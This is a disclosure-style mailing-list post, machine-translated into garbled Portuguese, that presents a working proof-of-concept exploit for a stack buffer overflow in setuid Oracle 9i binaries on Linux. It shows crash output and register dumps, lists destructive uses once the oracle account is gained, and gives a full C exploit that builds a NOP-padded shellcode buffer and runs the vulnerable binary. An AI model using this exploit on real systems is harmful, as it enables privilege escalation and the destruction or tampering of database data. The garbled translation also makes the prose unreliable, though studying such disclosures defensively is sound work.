-----COMEÇA PGP ASSINADO
MENSAGEM-----
Hash: SHA1
/*
** Prova de Código De Conceito trouxe para você por [email protected]
**
Liberação 2 Remenda Conjunto 3 Ver 9.2.0.4.0 ao Linux
x86
** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
Oracle 9i instalado sobre um Redhat 9 x86 nó com o Oracle mais
recente
remende kit tem um
pilha genérica baseada inundação do buffer.
Por passar um argv grande[1] um de fio de entrada é capaz de
ao overwrite o
EIP registra com
usuário controlado dados, resultando em uma falta do segmentation
que pode ser
controlado permitir
a execução de código arbitrário.
/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle
/database/u00/app/oracle/product/9.2.0.1.0/bin/oracleO
with Release 2 Patch Set 3 Version 9.2.0.4.0 for Linux.
Esses binários tornam-se vulneráveis para atacar porque
eles são feitos ou
obtenha conjunto com um +s
bandeira. Isto permite usuários que não `oracle` para
anexar restringir
seções das
banco de dados, segmentos de memória ....
Todo nós necessitamos criar um shellcode que vai setreuid do
oracle
userID no
sistema vulnerável, usuário do oracle complacente ao mundo.
Por explorar este bug básico, um é apresentado com as
seguintes opções:
1) binários do oracle de troiano
2) apaga arquivos de banco de dados chaves
3) corrompe ou modifica dados
4) shutdown aborta o banco de dados
5) algo senão usuário do oracle pode fazer
Arquitetura do AIX tem também sido testada e parece estar vulnerável
para
o mesmo ataque, Eu
advinhe que provavelmente todo outro arch está também.
Se você corre oracle como raiz (não sabe por que você
poderia fazer tal uma coisa)
então você vai solto
seu servidor, desprendendo seu banco de dados está não
assim ruim??
bash> `which ulimit` -c 999999
bash> /database/u00/app/oracle/product/9.2.0.1.0/bin/oracle `perl
-e
'print "A"x9850'`
Segmentation fault (core dumped)
#0 0x41414141 in ?? ()
(gdb) i r
eax 0x1d16 7446
ecx 0xbfffb5a8 -1073760856
edx 0x41414141 1094795585
ebx 0x41414141 1094795585
esp 0x41414141 0x41414141
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x10202 66050
cs 0x23 35
....
Um trabalho rápido cerca por isto poderia ser remover [+s] bandeira.
Esta vontade
pare qualquer um existência
capaz para ganhar `oracle` acessa ao banco de dados via isto aconselhado
método.
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
Desde o clearcase abusa informação não foi postada
em todos foruns,
Eu pensei Eu posso
compartilhe este doce do Oracle que Eu mencionei em isso consultivo.
Aqui isto está, c0ntex está ainda não cheio de
ar quente ou reclamações falsas, este
coisa é homem verdadeiro.
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
Meu bug de biblioteca no Linux provado estar o useless bonito. Informação
de Exemplo
para fazer todo
falta do segmentation de binários:
bash># echo $LD_PRELOAD
bash># export LD_PRELOAD=/bin/su
bash># ulimit -c 999999
bash># su
Segmentation fault (core dumped)
bash># passwd
Segmentation fault (core dumped)
tsk tsk...
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
Ok, nenhumas mais piadas, Eu não aborrecerei pessoas com informação
sobre bugs
sem postar
código para ir com isto. Assim Eu não mencionarei as questões
com o php, rlogin,
default apache2
instale e .. oops, Eu não mencionarei eles até Eu sou
desejoso para compartilhar
código. Relaxe
fella..! =|
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
Oracle informado acima de um mês atrás, obtido retorna
para me muito rapidamente mas tenho
escutado nowt desde,
ele que demoras é um deleite do shepards... Se você obtem
possuiu, culpa eles!
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
Comentários, pergunta para [email protected] - Arde para [email protected]
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** **
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define VERSION "Operation_Oracle_Owner_Ownage_Overflow_Oday Version
1.0.1"
#define VULNUBL "oracle"// Vulnerable binary
#define SMASHIT 9850 // Minimum BUFF
#define DEFAULT 2222 // Default RET_OFSET
#define PADDING 0x90 // BUFF PADDING
#define REALUID // ORACLE UserID For Shellcode Testing
//#define BADPAD 15000
/* Oracle UID Shellcode :: "\x31\xc0\xb3"REALUID"\xb0\x46\xcd\x80";
*/
char operation_oracle[] = "\x31\xc0\x31\xdb\xfe\xc0\xcd\x80";
unsigned long retrieve_offset()
{
__asm__(
"movl %esp, %eax"
);
}
int main(int argc, char *argv[])
{
char Bucket[SMASHIT];
unsigned long badd_addr;
unsigned short delta = 0x00;
unsigned short i;
if(argc > 1) {
delta = atol(argv[0x01]);
}
else
{
delta = DEFAULT;
}
badd_addr = retrieve_offset() - delta;
printf("\n\n*************************************************************\n"
"*************************************************************\n");
printf("[-] %s\n", VERSION);
printf("[-] -------------------------------------------------------\n"
"[-] Um valor de offset de 1750 - 3500 deveria trabalhar perfectly\n"
"[-] se isto não prega isto primeiro time.\n"
"[-] -------------------------------------------------------\n"
"[-] Executa este PoC e anexa ltrace com -o para um arquivo so\n"
"[-]você pode grep ao goodness - [email protected]\n"
"[-] http://twistedminds.mine.nu/files/oracle_ownage.c\n"
"[-] -------------------------------------------------------\n"
"[-] gcc -Wall -o oracle_owned oracle_owned.c\n"
"[-] Usage: %s offset_value\n", argv[0x00]);
for(i = 0x00; i < SMASHIT; i += 0x04)
*(long *) &Bucket[i] = badd_addr;
for(i = 0x00; i < (SMASHIT - strlen(operation_oracle) - 0x50); i++)
*(Bucket + i) = PADDING;
memcpy(Bucket + i, operation_oracle, strlen(operation_oracle));
printf("[-] Using Return address 0x%lx\n", badd_addr);
printf("[-] Using offset value %d\n", delta);
printf("*************************************************************\n"
"*************************************************************\n\n");
execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle",
VULNUBL,
Bucket, NULL);
return 0x00;
}
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
wkYEARECAAYFAj+P0W0ACgkQvnJS7S45cpIgXgCghB+feNbk4+QIoVUAliqQUsxR0uUA
nR3AQccz60/M2tpve6semKstH1kv
=CFUp
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434
Promote security and make money with the Hushmail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Cracks's S.A